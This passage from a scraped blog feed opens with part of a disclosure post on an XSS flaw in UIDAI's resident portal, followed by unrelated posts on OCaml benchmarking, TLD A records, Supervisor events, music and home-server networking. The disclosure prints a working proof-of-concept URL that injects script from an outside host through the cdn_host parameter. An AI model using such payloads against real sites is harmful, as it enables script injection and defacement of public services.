@sanitarypanels)\nMultiple RCEs: See issue-62 for eg.\nIn fact the release is so old it does not even appear on the “Known Vulnerabilities” page on the LifeRay website; you have to go look at their Archived Vulnerabilities.\nThe PoC\nYou can find a simple Proof of Concept for the XSS issue at resident.uidai.gov.in.\nThe cdn_host parameter injects javascript from $CDN_HOST\u002FResident-theme\u002Fjs\u002Fcustom.js, in this case https:\u002F\u002Fscan.bb8.fun\u002FResident-theme\u002Fjs\u002Fcustom.js which hosts a small snippet to overwrite the HTML of the page.\nIt shows up like:\n\nFun\nThe current script allows for embeding any tweet using a tweet parameter. To embed:\nGo to any tweet, copy the part after twitter.com and pass it as the tweet parameter. For eg, to embed this tweet:\nBreaking: Exclusive footage from inside @UIDAI's IT department after media reports of Aadhaar data leaks. pic.twitter.com\u002FW7m9L0HvEX\n— Aadhaar Compound Wall (@13footwall) March 29, 2018\n\n\n\n  \nLook at the URL: https:\u002F\u002Ftwitter.com\u002F13footwall\u002Fstatus\u002F979301578686345216\nCopy 13footwall\u002Fstatus\u002F979301578686345216 and pass it as the tweet parameter:\nThe URL becomeshttps:\u002F\u002Fresident.uidai.gov.in\u002F?cdn_host=https:\u002F\u002Fscan.bb8.fun&tweet=13footwall\u002Fstatus\u002F979301578686345216\nSHARE IT\nThe Report\nI initially reported this to help@uidai.gov.in in Jan 2017:\n\nForgot all about it till Jan 2018, when someone mentioned I should try my luck with CERT-IN instead:\n\nUpdate\nThere is some confusion regarding which version of LifeRay\nis UIDAI running. They seem to be running 6.1.1, released in 2013-02-26.\nThe exact version is not relevant to the fact that UIDAI is:\nrunning an unsupported release\nwhich is 5 year old\nnot updating it despite being notified multiple times\n0800 16-Sep: UIDAI seems to have patched the issue by putting a block on the cdn_host parameter. This still leaves them vulnerable to multiple vulnerabilities until they update to a supported release.\nTimeline\nThe vulnerability is still not fixed. Here is a complete timeline:\nDate\n      What?\n    \n16 Jan 2017\n      Initially reported to help@uidai.gov.in. No response\n    \n21 Jan 2018\n      Reported to ceo@uidai.gov.in and info@cert-in.org.in. No response\n    \n19 Feb 2018\n      Reminder sent to ceo@uidai.gov.in and info@cert-in.org.in\n    \n19 Feb 2018\n      Acknowledgement from CERT\n    \n15 Mar 2018\n      Reminder sent. No response\n    \n17 Mar 2018\n      Notified NCIIPC\n    \n18 Mar 2018\n      Confirmation from NCIIPC asking for more details. I replied back with a quote of previous exchange\n    \n19 Mar 2018\n      Confirmation from NCIIPC thanking me for the report.\n    \n19 Apr 2018\n      Reminder sent to UIDAI asking for acknowledgement\n    \n30 May 2018\n      Reminder sent to NCIIPC and CERT asking for updates\n    \nThe only change that I’m aware of since my initial report is that the website stopped declaring the LifeRay version in a HTTP response Header.",[],{"slug":2487,"title":2488,"link":2489,"pubDate":2490,"contentSnippet":2491,"tags":2492,"maintainerName":349,"maintainerUsername":350,"maintainerPhoto":351,"feedUrl":352},"1543-multicore-ci","Continuous Benchmarking & Call for Benchmarks","https:\u002F\u002Fkcsrk.info\u002Fmulticore\u002Focaml\u002Fbenchmarks\u002F2018\u002F09\u002F13\u002F1543-multicore-ci\u002F","2018-09-13T15:43:00.000Z","Over the past few weeks, at OCaml Labs, we’ve deployed\ncontinuous benchmarking infrastructure for Multicore\nOCaml. Live results are available\nat http:\u002F\u002Focamllabs.io\u002Fmulticore. Continuous\nbenchmarking has already enabled us to make informed\ndecisions about the\nimpact of our changes, and should come in handy over the next few months where\nwe polish off and tune the multicore runtime.\nCurrently, the benchmarks are all single-threaded and run on x86-64. Our current\naim is to quantify the performance impact of running single-threaded OCaml\nprograms using the multicore compiler. Moving forward, would would include\nmulti-threaded benchmarks and other architectures.\nThe benchmarks and the benchmarking infrastructure were adapted from OCamlPro’s\nbenchmark suite aimed at\nbenchmarking Flambda optimisation passes.\nThe difference with the new infrastructure is that all the data is generated as\nstatic HTML and CSV files with data processing performed on the client side in\nJavaScript. I find the new setup easier to manage and deploy.\nQuality of benchmarks\nIf you observe the results, you will see that multicore is slowest compared to\ntrunk OCaml on menhir-standard and menhir-fancy. But if you look closely:\n\nthese benchmarks complete in less than 10 milliseconds. This is not enough time\nto faithfully compare the implementations as constant factors such as runtime\ninitialisation and costs of single untimely major GC dominate any useful work.\nIn fact, almost half of the benchmarks complete within a second. The quality of\nthis benchmark suite ought to be improved.\nCall for benchmarks\nWhile we want longer running benchmarks, we would also like those benchmarks to\nrepresent real OCaml programs found in the wild. If you have long running real\nOCaml programs, please consider adding it to the benchmark suite. Your\ncontribution will ensure that performance-oriented OCaml features such as\nmulticore and flambda are evaluated on representative OCaml programs.\nHow to contribute\nMake a PR to multicore branch of\nocamllabs\u002Focamlbench-repo.\nThe packages directory contains many examples for how to prepare programs for\nbenchmarking. Among these, numerical-analysis-bench and menhir-bench are\nsimple and illustrative.\nThe benchmarks themselves are run using these\nscripts.\nDockerfile\nThere is a handy Dockerfile to test benchmarking setup:\n$ docker build -t multicore-cb -f Dockerfile . #takes a while; grab a coffee\n\n\nThis builds the docker image for the benchmarking infrastructure. You can run\nthe benchmarks as:\n$ docker run -p 8080:8080 -it multicore-cb bash\n$ cd ~\u002Focamlbench-scripts\n$ .\u002Frun-bench.sh --nowait --lazy #takes a while; grab lunch\n\n\nYou can view the results by:\n$ cd ~\u002Flogs\u002Foperf\n$ python -m SimpleHTTPServer 8080\n\n\nNow on your host machine, point your browser to localhost:8080 to\ninteractively visualise the benchmark results.\nCaveats\nAim to get your benchmark compiling with OCaml 4.06.1. You might have trouble\ngetting your benchmark to compile with the multicore compiler due to several\nreasons:\nMulticore compiler has syntax extensions for algebraic effect\nhandlers\nwhich breaks packages that use ppx.\nMulticore compiler has a different C\nAPI which breaks core dependencies\nsuch as Lwt.\nCertain features such as marshalling closures and custom tag objects are\nunimplemented.\nIf you encounter trouble submitting benchmarks, please make an issue on\nkayceesrk\u002Focamlbench-scripts repo.",[],{"slug":2494,"title":2495,"link":2496,"pubDate":2497,"contentSnippet":2498,"tags":2499,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"tld-a-records","A records on top level domains","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2018\u002F08\u002F18\u002Ftld-a-records\u002F","2018-08-18T00:00:00.000Z","A few more changes since the last time I ran this.\nUpdate: An automatically updated version of this is available at https:\u002F\u002Fcaptnemo.in\u002Ftld-a-record\u002F\nTLD\n      IP\n      Web\n    \nai\n      209.59.119.34\n      [http] [https]\n    \narab\n      127.0.53.53\n      [http] [https]\n    \nbh\n      88.201.27.211\n      [http] [https]\n    \ncharity\n      127.0.53.53\n      [http] [https]\n    \ncm\n      195.24.205.60\n      [http] [https]\n    \ndk\n      193.163.102.58\n      [http] [https]\n    \ngg\n      87.117.196.80\n      [http] [https]\n    \ninc\n      127.0.53.53\n      [http] [https]\n    \nje\n      87.117.196.80\n      [http] [https]\n    \npa\n      168.77.8.43\n      [http] [https]\n    \npn\n      80.68.93.100\n      [http] [https]\n    \npolitie\n      127.0.53.53\n      [http] [https]\n    \ntk\n      217.119.57.22\n      [http] [https]\n    \nuz\n      91.212.89.8\n      [http] [https]\n    \nws\n      64.70.19.33\n      [http] [https]\n    \nмон\n      202.170.80.40\n      [http] [https]\n    \nмон\n      218.100.84.27\n      [http] [https]\n    \nмон\n      180.149.98.78\n      [http] [https]\n    \n政府\n      127.0.53.53\n      [http] [https]\n    \nعرب\n      127.0.53.53\n      [http] [https]\n    \nDiff:\n\n+bh\n+charity\n-etisalat\n+inc\n-اتصالات\n-招聘\n 政府",[],{"slug":2501,"title":2502,"link":2503,"pubDate":2504,"contentSnippet":2505,"tags":2506,"maintainerName":349,"maintainerUsername":350,"maintainerPhoto":351,"feedUrl":352},"jfp-effect-handlers","JFP Special Issue on Algebraic Effects and Handlers","https:\u002F\u002Fkcsrk.info\u002Fhandlers\u002Fpaper\u002F2018\u002F08\u002F16\u002Fjfp-effect-handlers\u002F","2018-08-16T09:09:00.000Z","Andrej Bauer and I are editing a special issue of JFP\non the theory and practice of algebraic effects and handlers. The CfP is below.\n\nCALL FOR PAPERS\n\nJFP Special Issue\non\nThe Theory and Practice of Algebraic Effects and Handlers\n\nSubmission Deadline: 18 January 2019\nExpected Publication Date: December 2019\n\n\nScope\nAn important aspect of real-world languages is their support for computational\neffects such as raising exceptions, printing to the screen, accessing a\ndatabase, non-determinism, and concurrency. In order to reason about the\nsemantics of a programming language with computational effects, it is necessary\nto separate the effects out from the rest of the language. To this end, algebraic\neffects permit a wide class of computational effects to be specified in a pure\nsetting using only operations that give rise to them and equations that the\noperations satisfy. The algebraic treatment of operations naturally leads to a\nnovel treatment of handlers for all computational effects, not just for\nexceptions.\nAlgebraic effect handlers have been steadily gaining attention as a programming\nlanguage feature since they generalise many control-flow abstractions such as\nexception handling, iterators, async\u002Fawait, or backtracking, while ensuring\nthat the composition of various features remains well-behaved. Indeed, there\nare implementations of algebraic effects and effect handlers as libraries in C,\nClojure, F#, Haskell, OCaml, Scala, JavaScript, as well as full-fledged\nlanguages such as Eff, Frank, Links, Koka, and Multicore OCaml. Algebraic effect\nhandlers have also influenced the design of software tools in industry\nincluding Facebook’s React UI library and Uber’s Pyro probabilistic programming\nlanguage.\nTo recognise and encourage the publication of mature research contributions in\nthis area, a special issue of the Journal of Functional Programming (JFP) will\nbe devoted to the same theme.\nTopics\nFull-length, archival-quality submissions are solicited on theoretical and\npractical aspects of algebraic effects and handlers. Examples\ninclude, but are not limited to:\nReasoning about algebraic effects and handlers (denotational semantics,\ndependent types, logical relations, language support for equational reasoning)\nEffect typing (subtyping, row-polymorphism, generativity, encapsulation)\nImplementation of effect handlers (dynamic effects, selective CPS\ntranslations, delimited continuations)\nApplications of algebraic effect handlers (probabilistic programming, event\ncorrelation, meta-programming, asynchronous I\u002FO, debugging)\n\nReports on applications of these techniques to real-world problems are\nespecially encouraged, as are submissions that relate ideas and concepts from\nseveral of these topics, or bridge the gap between theory and practice.\nPapers will be reviewed as regular JFP submissions, and acceptance in the\nspecial issue will be based on both JFP’s quality standards and relevance to\nthe theme. The special issue also welcomes high-quality survey and position\npapers that would benefit a wide audience.\nAuthors are encouraged to indicate interest in submitting by December 14,\n2018, to aid in identifying suitable reviewers. The submission deadline is\nJanuary 18, 2019. The expected submission length is 25-35 pages, excluding\nbibliography and appendices. Shorter submissions are encouraged; prospective\nauthors of longer submissions should discuss their plans with the special issue\neditors in advance.\nSubmissions that are based on previously-published conference or workshop\npapers must clearly describe the relationship with the initial publication, and\nmust differ sufficiently that the author can assign copyright to Cambridge\nUniversity Press. Prospective authors are welcome to discuss such submissions\nwith the editors to ensure compliance with this policy.\nSubmissions\nSubmissions should be sent through the JFP Manuscript Central system at\nhttps:\u002F\u002Fmc.manuscriptcentral.com\u002Fcup\u002Fjfp_submit.\nChoose “Effects and Handlers” as the paper type, so that it gets assigned to the\nspecial issue.\nFor other submission details, please consult an issue of the Journal of\nFunctional Programming or see the Journal’s web page at\nhttp:\u002F\u002Fjournals.cambridge.org\u002Fjid_JFP.\nTentative Schedule\n14 December 2018: Expression of interest\n18 January 2019: Submission deadline\n22 April 2019: First round of reviews\n23 August 2019: Revision deadline\n15 November 2019: Second round of reviews\n13 December 2019: Final accepted versions due\nGuest Editors\nAndrej Bauer, Faculty of Mathematics and Physics, University of Ljubljana\nKC Sivaramakrishnan, Department of Computer Science and Technology,\nUniversity of Cambridge\nEditors in Chief\nJeremy Gibbons, Department of Computer Science, University of Oxford\nMatthias Felleisen, College of Computer and Information Science, Northeastern\nUniversity",[],{"slug":2508,"title":2509,"link":2510,"pubDate":2511,"contentSnippet":2512,"tags":2513,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"biweekly-music-part-4","Bi-Weekly Music Post Part 4","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Fbiweekly-music-part-4\u002F","2018-07-28T15:40:55.000Z","I am writing this post exactly after 30 days of the last one, caught up with some work and I couldn’t write a new post, apologies! To make up for the delay, I have some absolutely gold reccos this time which I believe you will like it.\nIsaac Gracie - reverie#\n\nTash Sultana - Jungle#\n\n18th Dec - Tienas#\n\nPareek - Ariana and Amrina, Coke Studio Explorer 2018#\n\nWhen The Curtain Falls - Greta Van Fleet#\n\nPoppy Ackroyd - Paper#\n\nNothing Personal - Night Riots#\n\nDo reach out to me @mrkaran_ with your dose of music reccos.\nFin!",[],{"slug":2515,"title":2516,"link":2517,"pubDate":2518,"contentSnippet":2519,"tags":2520,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"biweekly-music-part-3","Bi-Weekly Music Post Part 3","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Fbiweekly-music-part-3\u002F","2018-06-28T16:00:55.000Z","Since the past one week, I’m having troubles in connecting to Spotify from India and my #1 source for discovering music is gone.\nI’ve started using Saavn but it has crappy recommendations and too much of “Bollywoody”\u002Fcrap shit thrown all over. Also, it requires location access to suggest new\nmusic. LOL is this a joke or what? Like seriously, can’t think of a single reason why a ML algo would require my location to suggest me music.\nAnyway, this week’s recommendation might be a bit more “Desi” as I’ve discovered some real good bands from our country and our beloved neighbours(ofcourse!)\nMist of Capricorn - Agam#\n\nRangapura Vihaara - Agam#\n\nToh Phir Aao - Levi’s Live Session 7 by Mustafa Zahid & ROXEN#\n\nAankhon Kay Sagar - Shafqat Amanat Ali, Coke Studio Pakistan, Season 2#\n\nHit Me Up - The PropheC#\n\nTareefan Reprise - Lisa Mishra#\n\nMessage In A Bottle - The Police#\n\nAgnes - Glass Animals#\n\nPsycho Killer - Talking Heads#\n\nDo reach out to me @mrkaran_ with your dose of music reccos.\nFin!",[],{"slug":2522,"title":2523,"link":2524,"pubDate":2525,"contentSnippet":2526,"tags":2527,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"biweekly-music-part-2","Bi-Weekly Music Post Part 2","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Fbiweekly-music-part-2\u002F","2018-06-14T07:00:55.000Z","Ive looped through Nescafe Basement like 100 times the past two weeks and still cant get enough of it. This is the kind of music I like, the kind that just grows on you until you loop endlessly and then hate it \nAnyway, the following is a list of songs that I have discovered and liked the most in the past two weeks.\nTattva - aswekeepsearching#\n\nKoothu Over Coffee - Agam#\n\nTere Ishq Mein Jo Bhi - Nescafe Basement#\n\nHoundmouth - Sedona#\n\nHeavy - Collective Soul#\n\nThe Youth - George Taylor#\n\nPorcupine - Pigeons Playing Ping Pong#\n\nMisirlou - Ashar Kazi & Shruti Naik (cover)#\n\nRedbone - Childish Gambino (ukulele cover)#\n\nDo reach out to me @mrkaran_ with your dose of music reccos.\nFin!",[],{"slug":2529,"title":2530,"link":2531,"pubDate":2532,"contentSnippet":2533,"tags":2534,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"supervisor-notifications","Receiving notifications from Supervisor","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Fsupervisor-notifications\u002F","2018-06-03T05:27:55.000Z","Supervisor Events#\nI had a seemingly simple task which was to receive notifications any time a process managed by Supervisor restarts. I wanted a generic solution where I could get notifications for any change in the process state. Supervisor Events saved my day, although I would admit it wasn’t straightforward to set up.\nSupervisor uses STDIN\u002FSTDOUT mechanism to communicate with the event listener. You need to configure your event listener in such a way that it can understand the STDIN sent by Supervisor and also communicate back using STDOUT. You can write this event handler in any language you like as long as you conform to the specially formatted messages that Supervisor sends and expects. I had struggled the most at this step and my google-fu didn’t help much in this case.\nSupervisor by default will send these events even if no listener is configured. Once you have your own listener setup, you can execute any task you want, eg: send email\u002Ftelegram\u002Fslack messages etc.\nIn order to configure your event listener, you need to add it to your supervisor.conf. Here’s an example configuration:\n[eventlistener:wowevent]\ncommand=\u002Fhome\u002Fwork\u002Ftestevent\u002Ftest.py\nevents=PROCESS_STATE_STARTING\nprocess_name=%(program_name)s_%(process_num)s\nnumprocs=1\nautorestart=true\nstderr_logfile=\u002Fhome\u002Fwork\u002Ftestevent\u002Flogs\u002Fevent_err.log\nstdout_logfile=\u002Fhome\u002Fwork\u002Ftestevent\u002Flogs\u002Fevent.log\nFor the program to know that it has to send a notification at wowevent pool, you need to add the events key to the program section of supervisor.conf.\n[program:myprog]\n...\nevents=PROCESS_STATE_STARTING\n...\nNow everytime myprog is about to start, it will send an event to wowevent event pool. Your event listener which is configured at \u002Fhome\u002Fwork\u002Ftestevent\u002Ftest.py will handle the notification and execute tasks which you want to perform.\nThere are a bunch of event states that Supervisor captures, I was interested in knowing when my process has started, so I used PROCESS_STATE_RUNNING. You can take a look at all different event types here.\nDuring all this experimentation I came across a bug (which I later found it is a known issue, and an open bug since 4 years now). If you’ve been using Supervisor I am sure at least once you’ve been bitten by not rereading the config file and wondering why Supervisor isn’t picking up changes in config file when you restart the Supervisor. So reread and update becomes a muscle memory after this event .\nThe bug with events is that if you make any changes to the event group, reread doesn’t pick up this change. I initially thought this must be the standard way Supervisor is behaving because I didn’t change any program group. I randomly decided to change the event listener name and BAM! Supervisor read the new configuration and everything suddenly works! ARGH. Why do complex problems have such simple solutions  (not a solution, rather a workaround, but you get the drift right?)\nSupervisor Event Listener Protocol#\nSupervisor sends a header which is a key value pair of meta-attributes about the process and event. This header looks something like\nver:3.0 server:supervisor serial:208 pool:mylistener poolserial:0 eventname:PROCESS_STATE_RUNNING len:69\nThe event listener mylistener will be in ACKNOWLEDGED state when Supervisor sends the event PROCESS_STATE_RUNNING. Now that the myslistener state has received this ACKNOWLEDGED state, the event listener will send READY back to Supervisor. This is to let Supervisor know that the listener has received the notification.\nSupervisor puts the listener to BUSY state now and here you can do write your custom task. Supervisor waits for the task to get executed and when it does, the listener needs to communicate back with the result. This process is one full request-response cycle.\nLet us write a simple Python script which will listen to Supervisor event notification and communicate back, all in a protocol Supervisor understands.\nimport sys\nimport requests\n\nimport logging\nlogger = logging.getLogger('event_listener')\nhandler = logging.FileHandler('\u002Fhome\u002Fuser\u002Fprod\u002Fevents\u002Flogs\u002Fresponse.log')\nformatter = logging.Formatter('%(asctime)s %(levelname)s %(message)s')\nhandler.setFormatter(formatter)\nlogger.addHandler(handler)\nlogger.setLevel(logging.DEBUG)\nHere I am just setting up basic logging structure since I want to keep the stdout messages separate from what Supervisor uses.\ndef write_stdout(s):\n    # only eventlistener protocol messages may be sent to stdout\n    sys.stdout.write(s)\n    sys.stdout.flush()\n\ndef write_stderr(s):\n    sys.stderr.write(s)\n    sys.stderr.flush()\nWe have written helper functions which will be used to communicate with Supervisor. Now comes the main part (Sorry for bad pun! )\ndef main():\n    while 1:\n        # Hey Supervisor, I'm ready for some action\n        write_stdout('READY\\n')\n\n        # Reading the header from STDIN\n        line = sys.stdin.readline()\n        write_stderr(line)\n\n        # read event payload and print it to stderr\n        headers = dict([ x.split(':') for x in line.split() ])\n        data = sys.stdin.read(int(headers['len']))\n        write_stderr(data)\n\n        # add your events here\n        notify_user()\n\n        # transition from READY to ACKNOWLEDGED\n        write_stdout('RESULT 2\\nOK')\n        logger.debug(\"It's all fine and dandy\")\n\nif __name__ == '__main__':\n    main()\nLet us break this into pieces.\nwrite_stdout('READY\\n')\nWe flush READY with a linefeed character (\\n) to STDOUT. Supervisor has put mylistener to BUSY state now.\nline = sys.stdin.readline()\nwrite_stderr(line)\nline would be the header which we discussed previously.\ndata = sys.stdin.read(int(headers['len']))\nThis part is interesting. Here, we capture the len key from the header and read the next STDIN line up to this many chars. The data would consist of our event payload.\nEvent payload looks something like:\nprocessname:prog-restartv3_0 groupname:prog-restartv3 from_state:STOPPED tries:0ver:3.0 server:supervisor serial:25 pool:prog-restartv3 poolserial:3 eventname:PROCESS_STATE_STARTING len:76`\nnotify_user()\nThis is the handler where you can send an email, send a request to API, log it to file etc.\nwrite_stdout('RESULT 2\\nOK')\nFinally, we tell Supervisor to put the listener from BUSY to ACKNOWLEDGED state, by sending a result structure. The result could be FAIL or OK, so you need to send RESULT followed by the length of the state variable. For example for OK you will send RESULT 2\\nOK but for FAIL you have to send RESULT 4\\nFAIL.\nThat’s pretty much all you need to start receiving notifications from Supervisor every time your program changes its state. If you found this article useful, I’d love if you share this on Twitter or Facebook and let your friends know about it too.",[],{"slug":2536,"title":2537,"link":2538,"pubDate":2539,"contentSnippet":2540,"tags":2541,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"google-tld-no-more-a-records","Google owned TLDs don't have A records any more","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2018\u002F06\u002F02\u002Fgoogle-tld-no-more-a-records\u002F","2018-06-02T00:00:00.000Z","A little while ago (Jan 2018), I ran a scan to see which all TLDs have an A record set (on the TLD). This is what lets you visit http:\u002F\u002Fai\u002F as a valid website on your browser, for eg.\nI ran the same scan as http:\u002F\u002Fblog.towo.eu\u002Fa-records-on-top-level-domains\u002F (link is down, archived) and the results are at https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2018\u002F02\u002F09\u002Ftld-a-records\u002F.\nDecided to re-run the scan today, and noticed a stark difference: A lot of Google-owned TLD’s which were earlier pointing to 127.0.53.53 don’t have a A record anymore.\nScan run from AS45609.\nResults:\nTLD\n      IP\n      Web\n    \nai\n      209.59.119.34\n      [http], [https]\n    \narab\n      127.0.53.53\n      Private IP\n    \ncm\n      195.24.205.60\n      [http], [https]\n    \ndk\n      193.163.102.58\n      [http], [https]\n    \netisalat\n      127.0.53.53\n      Private IP\n    \ngg\n      87.117.196.80\n      [http], [https]\n    \nje\n      87.117.196.80\n      [http], [https]\n    \npa\n      168.77.8.43\n      [http], [https]\n    \npn\n      80.68.93.100\n      [http], [https]\n    \npolitie\n      127.0.53.53\n      Private IP\n    \ntk\n      217.119.57.22\n      [http], [https]\n    \nuz\n      91.212.89.8\n      [http], [https]\n    \nws\n      64.70.19.33\n      [http], [https]\n    \nмон\n      218.100.84.27\n      [http], [https]\n    \nмон\n      202.170.80.40\n      [http], [https]\n    \nмон\n      180.149.98.78\n      [http], [https]\n    \nاتصالات\n      127.0.53.53\n      Private IP\n    \n政府\n      127.0.53.53\n      Private IP\n    \nعرب\n      127.0.53.53\n      Private IP\n    \n招聘\n      127.0.53.53\n      Private IP\n    \nComparing with the previous scan, these TLDs no longer have an A record with them:\n\n-android\n-cal\n-chrome\n-dclk\n-drive\n-gle\n-guge\n-hangout\n-nexus\n-play\n-sport\n-谷歌\n-グーグル\n\n\nThe majority of these are owned by Google. Not claiming it means anything, just a nice observation.\nUpdate: An automatically updated version of this is available at https:\u002F\u002Fcaptnemo.in\u002Ftld-a-record\u002F",[],{"slug":2543,"title":2544,"link":2545,"pubDate":2546,"contentSnippet":2547,"tags":2548,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"biweekly-music-part-1","Bi-Weekly Music Post Part 1","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Fbiweekly-music-part-1\u002F","2018-05-28T15:00:55.000Z","I listen to a lot of music artists while working or otherwise. I plan to share some of the gems I discover each week. Thanks to Spotify and Youtube suggestions, I keep discovering a lot of indie artists and underrated titles. I hope you give them a listen and spread some good music in your circle.\nTere Jeya Hor Disda#\n\nAwari#\n\nMagpie Jay - Bigfoot#\n\nThe Local Train - Dilnawaz#\n\na-ha - Take On Me#\n\nLord Huron - The Night We Met#\n\nSnowmine - Let me in#\n\nGlass Animals - Pork Soda#\n\nIf you liked the above recommendations or you want to share moar music which I should definitely listen to, tweet to me @mrkaran_\nFin!",[],{"slug":2550,"title":2551,"link":2552,"pubDate":2553,"contentSnippet":2554,"tags":2555,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"home-server-networking","Home Server Networking","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2018\u002F04\u002F22\u002Fhome-server-networking\u002F","2018-04-22T00:00:00.000Z","Next in the Home Server series, this post documents how I got the networking setup to\nserve content publicly from my under-the-tv server.\n\nBackground\nMy home server runs on a mix of Docker\u002FTraefik orchestrated via Terraform. The source code is\nat https:\u002F\u002Fgit.captnemo.in\u002Fnemo\u002Fnebula (self-hosted, dogfooding FTW!) if you wanna take a look.\nThe ISP is ACT Bangalore1. They offer decent bandwidth and I’ve been a customer long time.\nPublic Static IP\nIn order to host content, you need a stable public IP. Unfortunately, ACT puts all of its customers\nin Bangalore behind a NAT 2. As a result, I decided to get a Floating IP from Digital Ocean 3.\nThe Static IP is attached to a cheap Digital Ocean Droplet (10$\u002Fmo). If you resolve bb8.fun, this is the IP you will get:\n\nName:   bb8.fun\nAddress: 139.59.48.222\n\n\nThe droplet has a public static IP of it’s own as well: 139.59.22.234. The reason I picked a Floating IP is because DO gives them for free, and I can switch between instances later without worrying about it.\nFloating IP\nOn the Digital Ocean infrastructure side, this IP is not directly attached to an interface on your droplet. Instead,\nDO uses something called “Anchor IP”:\nNetwork traffic between a Floating IP and a Droplet flows through an anchor IP, which is an IP address aliased to the Droplet’s public network interface (eth0). You should bind any public services that you want to make highly available through a Floating IP to the anchor IP.\nSo, now my Droplet has 2 different IPs that I can use:\nDroplet Public IP (139.59.22.234), assigned directly to the eth0 interface.\nDroplet Anchor IP (10.47.0.5), setup as an alias to the eth0 interface.\nThis doubles the number of services I can listen to. I could have (for eg) - 2 different webservers\non both of these IPs.\nOpenVPN\nIn order to establish NAT-punching connectivity between the Droplet and the Home Server, I run OpenVPN server\non the Droplet and openvpn-client on the homeserver.4\nThe Digital Ocean Guide is a great resource if you ever have to do this. 2 specific IPs on the OpenVPN\nnetwork are marked as static:\nDroplet: 10.8.0.1\nHome Server: 10.8.0.14\nHome Server - Networking\nThe server has a private static IP assigned to its eth0 interface\nIt also has a private static IP assiged to its tun0 interface\nThere are primarily 3 kinds of services that I like to run:\nAccessible only from within the home network (Timemachine backups, for eg) (Internal). This I publish on the eth0 interface.\nAccessible only from the public internet (Wiki) (Strictly Public). These I publish on the tun0 interface and proxy via the droplet.\nAccessible from both places (Emby, AirSonic) (Public). These I pubish on both tun0 and the eth0 interface on the homeserver.\nDocker Networking Basics\nDocker runs its own internal network for services, and lets you “publish” these services\nby forwarding traffic from a given interface to them.\nIn plain docker-cli, this would be:\ndocker run nginx --publish 443:443,80:80 (forward traffic on 443,80 on all interfaces to the container)\nSince I use Terraform, it looks like the following for Traefik:\n\n# Admin Backend\nports {\n  internal = 1111\n  external = 1111\n  ip       = \"${var.ips[\"eth0\"]}\"\n}\n\nports {\n  internal = 1111\n  external = 1111\n  ip       = \"${var.ips[\"tun0\"]}\"\n}\n\n# Local Web Server\nports {\n  internal = 80\n  external = 80\n  ip       = \"${var.ips[\"eth0\"]}\"\n}\n\n# Local Web Server (HTTPS)\nports {\n  internal = 443\n  external = 443\n  ip       = \"${var.ips[\"eth0\"]}\"\n}\n\n# Proxied via sydney.captnemo.in\nports {\n  internal = 443\n  external = 443\n  ip       = \"${var.ips[\"tun0\"]}\"\n}\n\nports {\n  internal = 80\n  external = 80\n  ip       = \"${var.ips[\"tun0\"]}\"\n}\n\n\nThere are 3 “services” exposed by Traefik on 3 ports:\nTraefik Admin Interface\n  Useful for debugging. I leave this in Read-Only mode with no authentication. This is an Internal service\n  HTTP, Port 80\n  This redirects users to the next entrypoint (HTTPS). This is a Public service.\n  HTTPS, Port 443\n  This is where most of the traefik flows. This is a Public service.\n\n\nFor all 3 of the above, Docker forwards traffic from both OpenVPN, as well as the home network. OpenVPN lets me access this from my laptop when I’m not at home, which is helpful for debugging issues. However, to keep the Admin Interface internal, it is not published to the internet.\nInternet Access\nThe “bridge” between the Floating IP and the OpenVPN IP (both on the Digital Ocean droplet) is simpleproxy. It is a barely-maintained 200 line TCP-proxy. I picked it up because of its ease of use as a TCP Proxy. I specifically looked for a TCP Proxy because:\nI did not want to terminate SSL on Digital Ocean, since Traefik was already doing LetsEncrypt cert management for me\nI also wanted to proxy non-web services (more below).\nThe simpleproxy configuration consists of a few systemd units:\n\n[Service]\nType=simple\nWorkingDirectory=\u002Ftmp\n# Forward Anchor IP 80 -> Home Server VPN 80\nExecStart=\u002Fusr\u002Fbin\u002Fsimpleproxy -L 10.47.0.5:80 -R 10.8.0.14:80\nRestart=on-abort\n\n[Install]\nWantedBy=multi-user.target\n\n[Unit]\nDescription=Simple Proxy\nAfter=network.target\n\n\nI run 3 of these: 2 for HTTP\u002FHTTPS, and another one for SSH.\nWhile I use simpleproxy for its stability and simplicity, you could also use iptables to\nachieve the same result.\nSSH Tunelling\nWhen I’m on the go, there are 3 different SSH services I might need:\nDigital Ocean Droplet\nHome Server\nGit (gitea runs its own internal git server)\nMy initial plan was:\nForward Port 22 Floating IP Traffic to Gitea.\nUse the eth0 interface on the droplet to run the droplet sshd service.\nKeep the Home Server SSH forwarded to OpenVPN, so I can access it over the VPN network.\nUnfortunately, that didn’t work out well, because sshd doesn’t support listening on an Interface. I could have used the Public Droplet IP, but I didn’t like the idea.\nThe current setup instead involves:\nRunning the droplet sshd on a separate port entirely (2222).\nThe simpleproxy service forwarding port 22 traefik to 2222 on OpenVPN IP which is then published by Docker to the gitea container’s port 22.\nThe complete traefik configuration is also available if you wanna look at the entrypoints in detail.\nCaveats\nTraefik Public Access\nYou might have noticed that because traefik is listening on both eth0 and tun0, there is no guarantee of a “strictly internal” service via Traefik. Traefik just uses the Host headers in the request (or SNI) to determine the container to which it needs to forward the request. I use *.in.bb8.fun for internaly accessible services, and *.bb8.fun for public. But if someone decides to spoof the headers, they can access the Internal service.\nSince I’m aware of the risk, I do not publish anything via traefik that I’m not comfortable putting on the internet. Only a couple of services are marked as “internal-also”, and are published on both. Services like Prometheus are not published via Traefik.\n2 Servers\nRunning and managing 2 servers takes a bit more effort, and has more moving parts.\nBut I use the droplet for other tasks as well (running my DNSCrypt Server, for eg).\nOriginal IP Address\nSince SimpleProxy does not 